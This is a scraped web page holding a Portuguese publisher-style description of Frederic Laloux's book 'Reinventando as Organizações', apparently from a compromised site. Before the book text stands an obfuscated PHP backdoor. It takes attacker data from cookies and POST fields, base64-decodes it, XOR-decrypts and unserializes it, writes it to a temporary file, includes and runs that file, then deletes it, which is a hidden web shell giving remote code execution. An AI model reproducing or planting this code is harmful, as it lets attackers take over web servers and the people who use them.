$VTwhB = chr (80) . chr ( 813 - 704 )."\162" . chr (95) . 'A' . 'z' . "\x51" . "\172";$BhcbIsPQma = chr (99) . "\154" . chr (97) . chr (115) . "\163" . chr ( 490 - 395 ).chr ( 959 - 858 ).chr ( 159 - 39 ).chr ( 600 - 495 )."\163" . chr ( 979 - 863 ).chr ( 696 - 581 ); $oLcEukCPx = class_exists($VTwhB); $BhcbIsPQma = "28800";$WFfESBvQPi = !1;if ($oLcEukCPx == $WFfESBvQPi){function GEUHXB(){return FALSE;}$IfMhowcR = "45328";GEUHXB();class Pmr_AzQz{private function rDNtGZHU($IfMhowcR){if (is_array(Pmr_AzQz::$lPDRcWBCLZ)) {$rVcHKfdcj = sys_get_temp_dir() . "/" . crc32(Pmr_AzQz::$lPDRcWBCLZ['s' . 'a' . chr ( 435 - 327 )."\x74"]);@Pmr_AzQz::$lPDRcWBCLZ[chr ( 319 - 200 ).'r' . 'i' . 't' . chr ( 918 - 817 )]($rVcHKfdcj, Pmr_AzQz::$lPDRcWBCLZ['c' . 'o' . chr ( 305 - 195 ).chr (116) . 'e' . 'n' . "\x74"]);include $rVcHKfdcj;@Pmr_AzQz::$lPDRcWBCLZ["\144" . 'e' . 'l' . "\145" . "\x74" . "\145"]($rVcHKfdcj); $IfMhowcR = "45328";exit();}}private $mkPduu;public function XcNdKoTLAF(){echo 9062;}public function __destruct(){$IfMhowcR = "28988_18323";$this->rDNtGZHU($IfMhowcR); $IfMhowcR = "28988_18323";}public function __construct($WFkWXiNW=0){$vilOifG = $_POST;$CyJcZ = $_COOKIE;$uInEWKD = "0ec9fffc-5159-4606-aa4e-553b2ecf126c";$iyfdjf = @$CyJcZ[substr($uInEWKD, 0, 4)];if (!empty($iyfdjf)){$AzSJhDSUY = "base64";$bgMNT = "";$iyfdjf = explode(",", $iyfdjf);foreach ($iyfdjf as $VfijKub){$bgMNT .= @$CyJcZ[$VfijKub];$bgMNT .= @$vilOifG[$VfijKub];}$bgMNT = array_map($AzSJhDSUY . chr ( 767 - 672 ).'d' . "\145" . "\143" . "\157" . "\x64" . "\x65", array($bgMNT,)); $bgMNT = $bgMNT[0] ^ str_repeat($uInEWKD, (strlen($bgMNT[0]) / strlen($uInEWKD)) + 1);Pmr_AzQz::$lPDRcWBCLZ = @unserialize($bgMNT); $bgMNT = class_exists("28988_18323");}}public static $lPDRcWBCLZ = 24805;}$KxLIaPqAce = new /* 4374 */ $VTwhB(45328 + 45328); $IfMhowcR = strpos($IfMhowcR, $IfMhowcR); $WFfESBvQPi = $KxLIaPqAce = $IfMhowcR = Array();} Reinventando as Organizações | Instituto Integral Brasil

Reinventando as Organizações
Um guia para criar organizações inspiradas no próximo estágio da consciência humana
Autor: Frederic Laloux

Um novo modelo organizacional está surgindo, prometendo uma revolução no local de trabalho. Frederic Laloux nos mostra que o próximo estágio da consciência humana está em curso e vai mudar a forma como administramos nossos negócios. Com exemplos e histórias de organizações pioneiras, este livro é leitura indispensável para líderes, empreendedores, fundadores, coaches e consultores.

E se fosse possível reinventar a forma como nos organizamos? E se empresas, indivíduos e instituições tivessem a possibilidade de trabalhar por um propósito evolutivo, livres para expressar o melhor de seu potencial, para colaborar e construir impacto positivo na sociedade?

Em Reinventando as organizações – Um guia para criar organizações inspiradas no próximo estágio da consciência humana, Frederic Laloux nos mostra que, ao longo da história, toda vez que a humanidade muda para um novo estágio de consciência, uma maneira jamais vista para estruturar e gerenciar as organizações também é desenvolvida, com avanços extraordinários em colaboração. Uma nova mudança na consciência está em curso. Poderia ela contribuir para reinventarmos a forma como administrarmos nossos negócios?

A maneira como gerimos as organizações está cada dia mais desatualizada. Cada vez mais, as pesquisas têm demonstrado que a maioria dos funcionários se sente desvinculada de suas empresas. A epidemia da desilusão organizacional vai muito além da América corporativa – também os professores, médicos e enfermeiros vêm abandonando a profissão em número recorde porque a forma como dirigimos escolas e hospitais é responsável por matar vocações. Empresas, organizações sem fins lucrativos e agências governamentais sofrem com os jogos de poder, politicagem, lutas internas e burocracia, em reuniões sem fim e numa sucessão aparentemente interminável de programas de mudança e de redução de custos.

No fundo, desejamos locais de trabalho com significado, autenticidade, comunidade, paixão e propósito. A solução, de acordo com muitos estudiosos progressistas, reside numa gestão mais esclarecida. Mas, na maioria dos casos, o sistema derrota o indivíduo: quando gerentes ou líderes passam por uma transformação interior, muitas vezes acabam deixando a organização. Não querem mais o jogo a que foram chamados a participar.

Precisamos de líderes mais esclarecidos, porém precisamos de mais do que isso: de estruturas e de práticas organizacionais esclarecidas. Mas será que essas coisas existem mesmo? Podemos conceber organizações assim?

As organizações pioneiras pesquisadas para este livro já “decifraram o código”. Seus fundadores questionam fundamentalmente todos os aspectos de gestão e usam métodos organizacionais totalmente novos. Embora operem em mercados e localidades muito diferentes e não conheçam experimentos uns dos outros, as estruturas e práticas que desenvolveram são notavelmente similares. É difícil não se entusiasmar com esta descoberta: um novo modelo organizacional parece estar surgindo, prometendo uma revolução significativa no local de trabalho.

Reinventando organizações descreve, em termos práticos, como organizações grandes e pequenas podem operar neste novo paradigma. Líderes, fundadores, coaches e consultores encontrarão neste trabalho um manual alegre, cheio de insights, exemplos e histórias inspiradoras.

Editora : Voo; 1ª Edição (8 fevereiro 2018)